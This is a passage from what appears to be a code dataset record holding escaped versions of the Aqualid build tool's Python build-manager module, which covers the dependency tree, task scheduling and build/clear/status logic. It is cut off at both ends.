__hasCycle(self, node, new_deps):\n if node in new_deps:\n return True\n deps = set(new_deps)\n node2deps = self.node2deps\n while deps:\n dep = deps.pop()\n dep_deps = node2deps[dep]\n if node in dep_deps:\n return True\n deps |= dep_deps\n return False\n\n def __depends(self, node, deps):\n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n try:\n current_node_deps = node2deps[node]\n deps = {dep for dep in deps if not dep.isBuilt()}\n new_deps = deps - current_node_deps\n if not new_deps:\n return\n if self.__hasCycle(node, new_deps):\n raise ErrorNodeDependencyCyclic(node, new_deps)\n self.tail_nodes.discard(node)\n current_node_deps.update(new_deps)\n for dep in new_deps:\n dep2nodes[dep].add(node)\n except KeyError as dep_node:\n raise ErrorNodeDependencyUnknown(node, dep_node.args[0])\n\n def __add(self, nodes):\n for node in nodes:\n if node not in self.node2deps:\n self.node2deps[node] = set()\n self.dep2nodes[node] = set()\n self.tail_nodes.add(node)\n node_srcnodes = node.getSourceNodes()\n node_depnodes = node.getDepNodes()\n self.__add(node_srcnodes)\n self.__add(node_depnodes)\n self.__depends(node, node_srcnodes)\n self.__depends(node, node_depnodes)\n\n def add(self, nodes):\n self.__add(toSequence(nodes))\n\n def depends(self, node, deps):\n deps = toSequence(deps)\n self.__add(deps)\n self.__depends(node, deps)\n\n def removeTail(self, node):\n node2deps = self.node2deps\n try:\n deps = node2deps.pop(node)\n if deps:\n raise InternalErrorRemoveNonTailNode(node)\n except KeyError as node:\n raise InternalErrorRemoveUnknownTailNode(node.args[0])\n tail_nodes = self.tail_nodes\n for dep in self.dep2nodes.pop(node):\n d = node2deps[dep]\n d.remove(node)\n if not d:\n tail_nodes.add(dep)\n\n def popTails(self):\n tails = self.tail_nodes\n self.tail_nodes = set()\n return tails\n\n def __getAllNodes(self, nodes):\n nodes = set(toSequence(nodes))\n all_nodes = set(nodes)\n node2deps = self.node2deps\n while nodes:\n node = nodes.pop()\n try:\n deps = node2deps[node] - all_nodes\n except KeyError as node:\n raise ErrorNodeUnknown(node.args[0])\n all_nodes.update(deps)\n nodes.update(deps)\n return all_nodes\n\n def shrinkTo(self, nodes):\n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n ignore_nodes = set(node2deps) - self.__getAllNodes(nodes)\n self.tail_nodes -= ignore_nodes\n for node in ignore_nodes:\n del node2deps[node]\n del dep2nodes[node]\n for dep_nodes in dep2nodes.values():\n dep_nodes.difference_update(ignore_nodes)\n\n def selfTest(self):\n if set(self.node2deps) != set(self.dep2nodes):\n raise AssertionError('Not all deps are added')\n all_dep_nodes = set()\n for node in self.dep2nodes:\n if node not in self.node2deps:\n raise AssertionError('Missed node: %s' % (node,))\n node_deps = self.node2deps[node]\n if not node_deps:\n if node not in self.tail_nodes:\n raise AssertionError(\n 'Missed tail node: %s, tail_nodes: %s' % (node,\n self.tail_nodes))\n elif node in self.tail_nodes:\n raise AssertionError('Invalid tail node: %s' % (node,))\n all_dep_nodes |= node_deps\n for dep in node_deps:\n if node not in self.dep2nodes[dep]:\n raise AssertionError(\n 'node not in self.dep2nodes[dep]: dep: %s, node: %s' %\n (dep, node))\n if all_dep_nodes - set(self.dep2nodes):\n raise AssertionError('Not all deps are added')\n\n\nclass _VFiles(object):\n __slots__ = 'names', 'handles'\n\n def __init__(self):\n self.handles = {}\n self.names = {}\n\n def __iter__(self):\n raise TypeError()\n\n def __getitem__(self, builder):\n builder_name = builder.name\n try:\n vfilename = self.names[builder_name]\n except KeyError:\n vfilename = os.path.join(builder.getBuildDir(), '.aql.db')\n self.names[builder_name] = vfilename\n try:\n return self.handles[vfilename]\n except KeyError:\n vfile = ValuesFile(vfilename)\n self.handles[vfilename] = vfile\n return vfile\n\n def close(self):\n for vfile in self.handles.values():\n vfile.close()\n self.handles.clear()\n self.names.clear()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n\n<mask token>\n\n\nclass _NodeState(object):\n __slots__ = ('initialized', 'check_depends', 'check_replace',\n 'check_split', 'check_actual', 'split_nodes')\n\n def __init__(self):\n self.initialized = False\n self.check_depends = True\n self.check_replace = True\n self.check_split = True\n self.check_actual = True\n self.split_nodes = None\n\n def __str__(self):\n return (\n 'initialized: %s, check_depends: %s, check_replace: %s, check_split: %s, check_actual: %s, split_nodes: %s'\n % (self.initialized, self.check_depends, self.check_replace,\n self.check_split, self.check_actual, self.split_nodes))\n\n\nclass _NodesBuilder(object):\n __slots__ = ('vfiles', 'build_manager', 'task_manager', 'node_states',\n 'building_nodes')\n\n def __init__(self, build_manager, jobs=0, keep_going=False,\n with_backtrace=True):\n self.vfiles = _VFiles()\n self.node_states = {}\n self.building_nodes = {}\n self.build_manager = build_manager\n self.task_manager = TaskManager(num_threads=jobs, stop_on_fail=not\n keep_going, with_backtrace=with_backtrace)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n def _getNodeState(self, node):\n try:\n state = self.node_states[node]\n except KeyError:\n state = _NodeState()\n self.node_states[node] = state\n return state\n\n def _removeNodeState(self, node):\n try:\n del self.node_states[node]\n except KeyError:\n pass\n\n def _addBuildingNode(self, node, state):\n conflicting_nodes = []\n building_nodes = self.building_nodes\n for name, signature in node.getNamesAndSignatures():\n node_signature = node, signature\n other_node, other_signature = building_nodes.setdefault(name,\n node_signature)\n if other_node is not node:\n if other_signature != signature:\n raise ErrorNodeSignatureDifferent(node)\n conflicting_nodes.append(other_node)\n if conflicting_nodes:\n state.check_actual = True\n self.build_manager.depends(node, conflicting_nodes)\n return True\n return False\n\n def _removeBuildingNode(self, node):\n building_nodes = self.building_nodes\n for name in node.getNames():\n del building_nodes[name]\n\n def isBuilding(self):\n return bool(self.building_nodes)\n\n def _checkPrebuildDepends(self, node):\n dep_nodes = node.buildDepends()\n if dep_nodes:\n self.build_manager.depends(node, dep_nodes)\n return True\n return False\n\n def _checkPrebuildReplace(self, node):\n if node.buildReplace():\n new_node_sources = node.getSourceNodes()\n if new_node_sources:\n self.build_manager.depends(node, new_node_sources)\n return True\n return False\n\n def _checkPrebuildSplit(self, node, state):\n build_manager = self.build_manager\n if state.check_split:\n state.check_split = False\n check_actual = True\n if node.isBatch() and state.check_actual:\n vfile = self.vfiles[node.builder]\n actual = build_manager.isActualNode(node, vfile)\n if actual:\n self._removeNodeState(node)\n build_manager.actualNode(node)\n return True\n check_actual = False\n split_nodes = node.buildSplit()\n if split_nodes:\n state.split_nodes = split_nodes\n for split_node in split_nodes:\n split_state = self._getNodeState(split_node)\n split_state.check_split = False\n split_state.check_depends = False\n split_state.check_replace = False\n split_state.check_actual = check_actual\n split_state.initialized = (split_node.builder is node.\n builder)\n self.build_manager.depends(node, split_nodes)\n return True\n elif state.split_nodes is not None:\n if node.isBatch():\n node._populateTargets()\n else:\n targets = []\n for split_node in state.split_nodes:\n targets += split_node.getTargetValues()\n node.target_values = targets\n self._removeNodeState(node)\n self.build_manager.completedSplitNode(node)\n return True\n return False\n\n def _prebuild(self, node, state):\n if not state.initialized:\n node.initiate()\n state.initialized = True\n if state.check_depends:\n state.check_depends = False\n if self._checkPrebuildDepends(node):\n return True\n if state.check_replace:\n state.check_replace = False\n if self._checkPrebuildReplace(node):\n return True\n if self._checkPrebuildSplit(node, state):\n return True\n return False\n\n def build(self, nodes):\n build_manager = self.build_manager\n vfiles = self.vfiles\n addTask = self.task_manager.addTask\n tasks_check_period = 10\n added_tasks = 0\n changed = False\n for node in nodes:\n node_state = self._getNodeState(node)\n if self._prebuild(node, node_state):\n changed = True\n continue\n if self._addBuildingNode(node, node_state):\n continue\n if node_state.check_actual:\n vfile = vfiles[node.builder]\n actual = build_manager.isActualNode(node, vfile)\n if actual:\n self._removeNodeState(node)\n self._removeBuildingNode(node)\n build_manager.actualNode(node)\n changed = True\n continue\n addTask(node, _buildNode, node)\n added_tasks += 1\n if added_tasks == tasks_check_period:\n changed = self._getFinishedNodes(block=False) or changed\n added_tasks = 0\n self._getFinishedNodes(block=not changed)\n\n def _getFinishedNodes(self, block=True):\n finished_tasks = self.task_manager.finishedTasks(block=block)\n vfiles = self.vfiles\n build_manager = self.build_manager\n for task in finished_tasks:\n node = task.task_id\n error = task.error\n self._removeNodeState(node)\n self._removeBuildingNode(node)\n vfile = vfiles[node.builder]\n if error is None:\n node.save(vfile)\n build_manager.completedNode(node, task.result)\n else:\n if node.isBatch():\n node.save(vfile)\n build_manager.failedNode(node, error)\n return bool(finished_tasks)\n\n def clear(self, nodes):\n vfiles = self.vfiles\n build_manager = self.build_manager\n for node in nodes:\n node_state = self._getNodeState(node)\n node_state.check_actual = False\n if self._prebuild(node, node_state):\n continue\n vfile = vfiles[node.builder]\n node.clear(vfile)\n build_manager.removedNode(node)\n\n def status(self, nodes):\n vfiles = self.vfiles\n build_manager = self.build_manager\n for node in nodes:\n node_state = self._getNodeState(node)\n node_state.check_actual = False\n if self._prebuild(node, node_state):\n continue\n vfile = vfiles[node.builder]\n if build_manager.isActualNode(node, vfile):\n build_manager.actualNodeStatus(node)\n else:\n build_manager.outdatedNodeStatus(node)\n\n def close(self):\n try:\n self.task_manager.stop()\n self._getFinishedNodes(block=False)\n finally:\n self.vfiles.close()\n\n\nclass BuildManager(object):\n __slots__ = ('_nodes', '_built_targets', '_failed_nodes',\n '_built_node_names', 'completed', 'actual', 'explain')\n\n def __init__(self):\n self._nodes = _NodesTree()\n self.__reset()\n\n def __reset(self, build_always=False, explain=False):\n self._built_targets = {}\n self._failed_nodes = {}\n self._built_node_names = set() if build_always else None\n self.completed = 0\n self.actual = 0\n self.explain = explain\n\n def add(self, nodes):\n self._nodes.add(nodes)\n\n def depends(self, node, deps):\n self._nodes.depends(node, deps)\n\n def __len__(self):\n return len(self._nodes)\n\n def selfTest(self):\n self._nodes.selfTest()\n\n def getTailNodes(self):\n return self._nodes.popTails()\n\n def actualNodeStatus(self, node):\n eventNodeActual(node, self.getProgressStr())\n self.actualNode(node)\n\n def outdatedNodeStatus(self, node):\n self._failed_nodes[node] = None\n eventNodeOutdated(node, self.getProgressStr())\n node.shrink()\n\n def isActualNode(self, node, vfile):\n return node.checkActual(vfile, self._built_node_names, self.explain)\n\n def _addToBuiltNodeNames(self, node):\n built_names = self._built_node_names\n if built_names is not None:\n built_names.update(node.getNames())\n\n def completedSplitNode(self, node):\n self._nodes.removeTail(node)\n node.shrink()\n\n def actualNode(self, node):\n self._nodes.removeTail(node)\n self.actual += 1\n node.shrink()\n\n def completedNode(self, node, builder_output):\n self._checkAlreadyBuilt(node)\n self._nodes.removeTail(node)\n self._addToBuiltNodeNames(node)\n self.completed += 1\n eventNodeBuildingFinished(node, builder_output, self.getProgressStr())\n node.shrink()\n\n def failedNode(self, node, error):\n self._failed_nodes[node] = error\n eventNodeBuildingFailed(node, error)\n\n def removedNode(self, node):\n self._nodes.removeTail(node)\n self.completed += 1\n eventNodeRemoved(node, self.getProgressStr())\n node.shrink()\n\n def getProgressStr(self):\n done = self.completed + self.actual\n total = len(self._nodes) + done\n processed = done + len(self._failed_nodes)\n progress = '%s/%s' % (processed, total)\n return progress\n\n def close(self):\n self._nodes = _NodesTree()\n\n def _checkAlreadyBuilt(self, node):\n values = node.getTargetValues()\n built_targets = self._built_targets\n for value in values:\n value_sign = value.signature\n other_value_sign = built_targets.setdefault(value.valueId(),\n value_sign)\n if other_value_sign != value_sign:\n eventBuildTargetTwice(value, node)\n\n def build(self, jobs, keep_going, nodes=None, build_always=False,\n explain=False, with_backtrace=True):\n self.__reset(build_always=build_always, explain=explain)\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self, jobs, keep_going, with_backtrace\n ) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails and not nodes_builder.isBuilding():\n break\n nodes_builder.build(tails)\n return self.isOk()\n\n def isOk(self):\n return not bool(self._failed_nodes)\n\n def failsCount(self):\n return len(self._failed_nodes)\n\n def printFails(self):\n for node, error in self._failed_nodes.items():\n eventFailedNode(node, error)\n\n def printBuildState(self):\n logInfo('Failed nodes: %s' % len(self._failed_nodes))\n logInfo('Completed nodes: %s' % self.completed)\n logInfo('Actual nodes: %s' % self.actual)\n\n def printStatusState(self):\n logInfo('Outdated nodes: %s' % len(self._failed_nodes))\n logInfo('Actual nodes: %s' % self.actual)\n\n def clear(self, nodes=None):\n self.__reset()\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails:\n break\n nodes_builder.clear(tails)\n\n def status(self, nodes=None, explain=False):\n self.__reset(explain=explain)\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails:\n break\n nodes_builder.status(tails)\n return self.isOk()\n", "step-5": "#\n# Copyright (c) 2011-2014 The developers of Aqualid project - http://aqualid.googlecode.com\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and\n# associated documentation files (the \"Software\"), to deal in the Software without restriction,\n# including without limitation the rights to use, copy, modify, merge, publish, distribute,\n# sublicense, and/or sell copies of the Software, and to permit persons to whom\n# the Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies or\n# substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\n# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE\n# AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n\n__all__ = (\n 'BuildManager',\n 'ErrorNodeDependencyCyclic', 'ErrorNodeDependencyUnknown',\n)\n\nimport os.path\n\nfrom aql.util_types import toSequence, AqlException\nfrom aql.utils import eventStatus, eventWarning, eventError, logInfo, logError, logWarning, TaskManager\nfrom aql.values import ValuesFile\n\n#//===========================================================================//\n\n@eventStatus\ndef eventNodeActual( settings, node, progress ):\n msg = \"(%s) ACTUAL: %s\" % (progress, node.getBuildStr( settings.brief ))\n logInfo( msg )\n\n#//===========================================================================//\n\n@eventStatus\ndef eventNodeOutdated( settings, node, progress ):\n msg = \"(%s) OUTDATED: %s\" % (progress, node.getBuildStr( settings.brief ))\n logInfo( msg )\n\n#//===========================================================================//\n\n@eventWarning\ndef eventBuildTargetTwice( settings, value, node1 ):\n logWarning(\"Target '%s' is built twice. The last time built by: '%s' \" %\n ( value.name, node1.getBuildStr( settings.brief )) )\n\n#//===========================================================================//\n\n@eventError\ndef eventFailedNode( settings, node, error ):\n \n msg = node.getBuildStr( settings.brief )\n msg += '\\n\\n%s\\n' % (error,)\n \n logError( msg )\n\n#//===========================================================================//\n\n@eventStatus\ndef eventNodeBuilding( settings, node ):\n pass\n\n#//===========================================================================//\n\n@eventStatus\ndef eventNodeBuildingFinished( settings, node, builder_output, progress ):\n \n msg = node.getBuildStr( settings.brief )\n if settings.with_output and builder_output:\n msg += '\\n'\n if builder_output:\n msg += builder_output\n msg += '\\n'\n \n msg = \"(%s) %s\" % (progress, msg)\n \n logInfo( msg )\n\n#//===========================================================================//\n\n@eventStatus\ndef eventNodeBuildingFailed( settings, node, error ):\n pass\n\n#//===========================================================================//\n\n@eventStatus\ndef eventNodeRemoved( settings, node, progress ):\n msg = node.getBuildStr( settings.brief )\n if msg:\n logInfo( \"(%s) Removed: %s\" % (progress, msg) )\n\n#//===========================================================================//\n\nclass ErrorNodeDependencyCyclic( AqlException ):\n def __init__( self, node, deps ):\n msg = \"Node '%s' (%s) has a cyclic dependency: %s\" % (node, node.getBuildStr(True), deps )\n super(ErrorNodeDependencyCyclic, self).__init__( msg )\n\n#//===========================================================================//\n\nclass ErrorNodeUnknown(AqlException):\n def __init__( self, node ):\n msg = \"Unknown node '%s'\" % (node, )\n super(ErrorNodeUnknown, self).__init__( msg )\n\n#//===========================================================================//\n\nclass ErrorNodeSignatureDifferent(AqlException):\n def __init__( self, node ):\n msg = \"Two similar nodes have different signatures (sources, builder parameters or dependencies): %s\" % (node.getBuildStr( brief = False ), )\n super(ErrorNodeSignatureDifferent, self).__init__( msg )\n\n#//===========================================================================//\n\nclass ErrorNodeDependencyUnknown(AqlException):\n def __init__( self, node, dep_node ):\n msg = \"Unable to add dependency to node '%s' from node '%s'\" % (node, dep_node)\n super(ErrorNodeDependencyUnknown, self).__init__( msg )\n\n#//===========================================================================//\n\nclass InternalErrorRemoveNonTailNode( AqlException ):\n def __init__( self, node ):\n msg = \"Removing non-tail node: %s\" % (node,)\n super(InternalErrorRemoveNonTailNode, self).__init__( msg )\n\n#//===========================================================================//\n\nclass InternalErrorRemoveUnknownTailNode(AqlException):\n def __init__( self, node ):\n msg = \"Remove unknown tail node: : %s\" % (node,)\n super(InternalErrorRemoveUnknownTailNode, self).__init__( msg )\n\n#//===========================================================================//\n\nclass BuildStat (object):\n __slots__ = \\\n (\n 'total',\n 'completed',\n 'failed',\n )\n \n def __init__(self, total):\n self.total = total\n self.completed = 0\n self.failed = 0\n \n def addTotal(self, count ):\n self.total += count\n \n def incCompleted(self):\n self.completed += 1\n \n def incFailed(self):\n self.failed += 1\n \n def getProgressStr(self):\n progress = \"%s/%s\" % (self.completed + self.failed, self.total )\n return progress\n\n#//===========================================================================//\n\nclass _NodesTree (object):\n \n __slots__ = \\\n (\n 'node2deps',\n 'dep2nodes',\n 'tail_nodes',\n )\n \n #//-------------------------------------------------------//\n \n def __init__( self ):\n self.node2deps = {}\n self.dep2nodes = {}\n self.tail_nodes = set()\n \n #//-------------------------------------------------------//\n \n def __len__(self):\n return len(self.node2deps)\n \n #//-------------------------------------------------------//\n \n def __hasCycle( self, node, new_deps ):\n \n if node in new_deps:\n return True\n \n deps = set(new_deps)\n node2deps = self.node2deps\n \n while deps:\n dep = deps.pop()\n \n dep_deps = node2deps[dep]\n \n if node in dep_deps:\n return True\n \n deps |= dep_deps\n \n return False\n \n #//-------------------------------------------------------//\n \n def __depends( self, node, deps ):\n \n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n \n try:\n current_node_deps = node2deps[ node ]\n \n deps = { dep for dep in deps if not dep.isBuilt() }\n new_deps = deps - current_node_deps\n \n if not new_deps:\n return\n \n if self.__hasCycle( node, new_deps ):\n raise ErrorNodeDependencyCyclic( node, new_deps )\n \n self.tail_nodes.discard( node )\n \n #//-------------------------------------------------------//\n \n current_node_deps.update( new_deps )\n \n #//-------------------------------------------------------//\n \n for dep in new_deps:\n dep2nodes[ dep ].add( node )\n \n except KeyError as dep_node:\n raise ErrorNodeDependencyUnknown( node, dep_node.args[0] )\n \n #//-------------------------------------------------------//\n \n def __add( self, nodes ):\n for node in nodes:\n if node not in self.node2deps:\n self.node2deps[ node ] = set()\n self.dep2nodes[ node ] = set()\n self.tail_nodes.add( node )\n\n node_srcnodes = node.getSourceNodes()\n node_depnodes = node.getDepNodes()\n\n self.__add( node_srcnodes ) # TODO: recursively add sources and depends\n self.__add( node_depnodes ) # It would be better to rewrite this code to avoid the recursion\n \n self.__depends( node, node_srcnodes )\n self.__depends( node, node_depnodes )\n \n #//-------------------------------------------------------//\n \n def add( self, nodes ):\n self.__add( toSequence( nodes ) )\n \n #//-------------------------------------------------------//\n \n def depends( self, node, deps ):\n deps = toSequence( deps )\n \n self.__add( deps )\n self.__depends( node, deps )\n \n #//-------------------------------------------------------//\n \n def removeTail( self, node ):\n node2deps = self.node2deps\n \n try:\n deps = node2deps.pop(node)\n if deps:\n raise InternalErrorRemoveNonTailNode( node )\n except KeyError as node:\n raise InternalErrorRemoveUnknownTailNode( node.args[0] )\n \n tail_nodes = self.tail_nodes\n \n # tail_nodes.remove( node )\n \n for dep in self.dep2nodes.pop( node ):\n d = node2deps[ dep ]\n d.remove( node )\n if not d:\n tail_nodes.add( dep )\n \n #//-------------------------------------------------------//\n \n def popTails( self ):\n tails = self.tail_nodes\n self.tail_nodes = set()\n return tails\n \n #//-------------------------------------------------------//\n \n def __getAllNodes(self, nodes ):\n nodes = set(toSequence(nodes))\n all_nodes = set( nodes )\n \n node2deps = self.node2deps\n while nodes:\n node = nodes.pop()\n \n try:\n deps = node2deps[ node ] - all_nodes\n except KeyError as node:\n raise ErrorNodeUnknown( node.args[0] )\n \n all_nodes.update( deps )\n nodes.update( deps )\n \n return all_nodes\n \n #//-------------------------------------------------------//\n \n def shrinkTo(self, nodes ):\n \n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n \n ignore_nodes = set(node2deps) - self.__getAllNodes( nodes )\n \n self.tail_nodes -= ignore_nodes\n \n for node in ignore_nodes:\n del node2deps[ node ]\n del dep2nodes[ node ]\n \n for dep_nodes in dep2nodes.values():\n dep_nodes.difference_update( ignore_nodes ) \n \n #//-------------------------------------------------------//\n \n def selfTest( self ):\n if set(self.node2deps) != set(self.dep2nodes):\n raise AssertionError(\"Not all deps are added\")\n \n all_dep_nodes = set()\n \n for node in self.dep2nodes:\n if node not in self.node2deps:\n raise AssertionError(\"Missed node: %s\" % (node,) )\n \n node_deps = self.node2deps[node]\n \n if not node_deps:\n if node not in self.tail_nodes:\n raise AssertionError(\"Missed tail node: %s, tail_nodes: %s\" % (node, self.tail_nodes) )\n else:\n if node in self.tail_nodes:\n raise AssertionError(\"Invalid tail node: %s\" % (node,) )\n \n all_dep_nodes |= node_deps\n \n for dep in node_deps:\n if node not in self.dep2nodes[dep]:\n raise AssertionError(\"node not in self.dep2nodes[dep]: dep: %s, node: %s\" % (dep, node) )\n \n if all_dep_nodes - set(self.dep2nodes):\n raise AssertionError(\"Not all deps are added\")\n\n#//===========================================================================//\n\nclass _VFiles( object ):\n __slots__ = \\\n (\n 'names',\n 'handles',\n )\n \n #//-------------------------------------------------------//\n \n def __init__( self ):\n self.handles = {}\n self.names = {}\n \n #//-------------------------------------------------------//\n \n def __iter__(self):\n raise TypeError()\n \n #//-------------------------------------------------------//\n \n def __getitem__( self, builder ):\n \n builder_name = builder.name\n \n try:\n vfilename = self.names[ builder_name ]\n except KeyError:\n vfilename = os.path.join( builder.getBuildDir(), '.aql.db' )\n self.names[ builder_name ] = vfilename\n \n try:\n return self.handles[ vfilename ]\n \n except KeyError:\n vfile = ValuesFile( vfilename )\n self.handles[ vfilename ] = vfile\n \n return vfile\n\n #//-------------------------------------------------------//\n \n def close(self):\n for vfile in self.handles.values():\n vfile.close()\n \n self.handles.clear()\n self.names.clear()\n \n #//-------------------------------------------------------//\n \n def __enter__(self):\n return self\n \n #//-------------------------------------------------------//\n \n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n#//===========================================================================//\n\ndef _buildNode( node ):\n \n eventNodeBuilding( node )\n \n out = node.build()\n \n if out:\n try:\n out = out.strip()\n except Exception:\n pass\n \n return out\n\n#//===========================================================================//\n\nclass _NodeState( object ):\n __slots__ = \\\n (\n 'initialized',\n 'check_depends',\n 'check_replace',\n 'check_split',\n 'check_actual',\n 'split_nodes',\n )\n \n def __init__(self ):\n self.initialized = False\n self.check_depends = True\n self.check_replace = True\n self.check_split = True\n self.check_actual = True\n self.split_nodes = None\n \n def __str__(self):\n return \"initialized: %s, check_depends: %s, check_replace: %s, check_split: %s, check_actual: %s, split_nodes: %s\" %\\\n (self.initialized, self.check_depends, self.check_replace, self.check_split, self.check_actual, self.split_nodes )\n \n#//===========================================================================//\n\n# noinspection PyAttributeOutsideInit\nclass _NodesBuilder (object):\n \n __slots__ = \\\n (\n 'vfiles',\n 'build_manager',\n 'task_manager',\n 'node_states',\n 'building_nodes',\n )\n \n #//-------------------------------------------------------//\n \n def __init__( self, build_manager, jobs = 0, keep_going = False, with_backtrace = True ):\n self.vfiles = _VFiles()\n self.node_states = {}\n self.building_nodes = {}\n self.build_manager = build_manager\n self.task_manager = TaskManager( num_threads = jobs, stop_on_fail = not keep_going, with_backtrace = with_backtrace )\n \n #//-------------------------------------------------------//\n \n def __enter__(self):\n return self\n \n #//-------------------------------------------------------//\n \n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n \n #//-------------------------------------------------------//\n \n def _getNodeState( self, node ):\n try:\n state = self.node_states[ node ]\n except KeyError:\n state = _NodeState()\n self.node_states[ node ] = state\n \n return state\n \n #//-------------------------------------------------------//\n \n def _removeNodeState( self, node ):\n try:\n del self.node_states[ node ]\n except KeyError:\n pass\n \n #//-------------------------------------------------------//\n \n def _addBuildingNode( self, node, state ):\n conflicting_nodes = []\n building_nodes = self.building_nodes\n \n for name, signature in node.getNamesAndSignatures():\n node_signature = (node, signature)\n \n other_node, other_signature = building_nodes.setdefault( name, node_signature )\n if other_node is not node:\n if other_signature != signature:\n raise ErrorNodeSignatureDifferent( node )\n \n conflicting_nodes.append( other_node )\n \n if conflicting_nodes:\n state.check_actual = True\n self.build_manager.depends( node, conflicting_nodes )\n return True\n \n return False\n \n #//-------------------------------------------------------//\n \n def _removeBuildingNode( self, node ):\n building_nodes = self.building_nodes\n for name in node.getNames():\n del building_nodes[ name ]\n \n #//-------------------------------------------------------//\n \n def isBuilding(self):\n return bool(self.building_nodes)\n \n #//-------------------------------------------------------//\n \n def _checkPrebuildDepends( self, node ):\n dep_nodes = node.buildDepends()\n if dep_nodes:\n self.build_manager.depends( node, dep_nodes )\n return True\n \n return False\n \n #//-------------------------------------------------------//\n \n def _checkPrebuildReplace( self, node ):\n \n if node.buildReplace():\n new_node_sources = node.getSourceNodes()\n if new_node_sources:\n self.build_manager.depends( node, new_node_sources )\n return True\n \n return False\n \n #//-------------------------------------------------------//\n \n def _checkPrebuildSplit( self, node, state ):\n \n build_manager = self.build_manager\n \n if state.check_split:\n state.check_split = False\n \n check_actual = True\n \n if node.isBatch() and state.check_actual:\n # Check for changed sources of BatchNode\n vfile = self.vfiles[ node.builder ]\n actual = build_manager.isActualNode( node, vfile )\n \n if actual:\n self._removeNodeState( node )\n build_manager.actualNode( node )\n return True\n \n check_actual = False\n \n split_nodes = node.buildSplit()\n if split_nodes:\n state.split_nodes = split_nodes\n for split_node in split_nodes:\n split_state = self._getNodeState( split_node )\n split_state.check_split = False\n split_state.check_depends = False\n split_state.check_replace = False\n split_state.check_actual = check_actual\n split_state.initialized = split_node.builder is node.builder\n \n self.build_manager.depends( node, split_nodes )\n return True\n \n elif state.split_nodes is not None:\n if node.isBatch():\n node._populateTargets()\n else:\n targets = []\n for split_node in state.split_nodes:\n targets += split_node.getTargetValues()\n \n node.target_values = targets\n \n self._removeNodeState( node )\n \n self.build_manager.completedSplitNode( node )\n \n return True\n \n return False\n \n #//-------------------------------------------------------//\n \n def _prebuild( self, node, state ):\n \n # print( \"node: %s, state: %s\" % (node, state))\n \n if not state.initialized:\n node.initiate()\n state.initialized = True\n \n if state.check_depends:\n state.check_depends = False\n if self._checkPrebuildDepends( node ):\n return True\n \n if state.check_replace:\n state.check_replace = False\n if self._checkPrebuildReplace( node ):\n return True\n \n if self._checkPrebuildSplit( node, state ):\n return True\n \n return False\n \n #//-------------------------------------------------------//\n \n def build( self, nodes ):\n \n build_manager = self.build_manager\n \n vfiles = self.vfiles\n addTask = self.task_manager.addTask\n \n tasks_check_period = 10\n added_tasks = 0\n changed = False\n \n for node in nodes:\n \n node_state = self._getNodeState( node )\n \n if self._prebuild( node, node_state ):\n changed = True\n continue\n \n if self._addBuildingNode( node, node_state ):\n continue\n \n if node_state.check_actual:\n vfile = vfiles[ node.builder ]\n actual = build_manager.isActualNode( node, vfile )\n \n if actual:\n self._removeNodeState( node )\n self._removeBuildingNode( node )\n build_manager.actualNode( node )\n changed = True\n continue\n \n addTask( node, _buildNode, node )\n \n added_tasks += 1\n \n if added_tasks == tasks_check_period:\n changed = self._getFinishedNodes( block = False ) or changed\n added_tasks = 0\n \n self._getFinishedNodes( block = not changed )\n \n #//-------------------------------------------------------//\n \n def _getFinishedNodes( self, block = True ):\n # print(\"tasks: %s, finished_tasks: %s\" % (self.task_manager.unfinished_tasks, self.task_manager.finished_tasks.qsize()))\n finished_tasks = self.task_manager.finishedTasks( block = block )\n \n vfiles = self.vfiles\n \n build_manager = self.build_manager\n \n for task in finished_tasks:\n node = task.task_id\n error = task.error\n \n self._removeNodeState( node )\n self._removeBuildingNode( node )\n \n vfile = vfiles[ node.builder ]\n \n if error is None:\n node.save( vfile )\n build_manager.completedNode( node, task.result )\n else:\n if node.isBatch():\n node.save( vfile )\n \n build_manager.failedNode( node, error )\n\n return bool(finished_tasks)\n \n #//-------------------------------------------------------//\n \n def clear( self, nodes ):\n \n vfiles = self.vfiles\n build_manager = self.build_manager\n \n for node in nodes:\n \n node_state = self._getNodeState( node )\n \n node_state.check_actual = False\n \n if self._prebuild( node, node_state ):\n continue\n \n vfile = vfiles[ node.builder ]\n node.clear( vfile )\n build_manager.removedNode( node )\n \n #//-------------------------------------------------------//\n \n def status( self, nodes ):\n \n vfiles = self.vfiles\n build_manager = self.build_manager\n \n for node in nodes:\n \n node_state = self._getNodeState( node )\n node_state.check_actual = False\n \n if self._prebuild( node, node_state ):\n continue\n \n vfile = vfiles[ node.builder ]\n if build_manager.isActualNode( node, vfile ):\n build_manager.actualNodeStatus( node )\n else:\n build_manager.outdatedNodeStatus( node )\n \n #//-------------------------------------------------------//\n \n def close( self ):\n try:\n self.task_manager.stop()\n self._getFinishedNodes( block = False )\n finally:\n 